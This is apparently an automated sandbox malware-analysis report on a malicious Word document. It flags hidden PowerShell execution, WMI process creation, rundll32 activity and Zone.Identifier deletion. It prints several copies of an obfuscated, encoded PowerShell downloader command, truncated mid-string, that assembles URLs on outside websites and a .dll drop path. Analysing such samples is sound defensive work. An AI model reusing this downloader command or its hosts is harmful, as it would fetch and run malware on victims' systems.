JwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK			Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008085 push ecx; ret		7_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004ADA push ecx; ret		7_2_10004AED

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vzmpbxrgkn\sbqrrdzml.sop:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ukzmpnozo\pnpaswzz.stx:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Awonhbftone\yxjcuugtve.ehy:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Sbbifaxj\wcgyhcz.btb:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ypmeuqhummj\uoygpjaare.osc:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xqivdealrt\nmtqooojq.rit:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Dzdlyz\nbltd.fbg:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
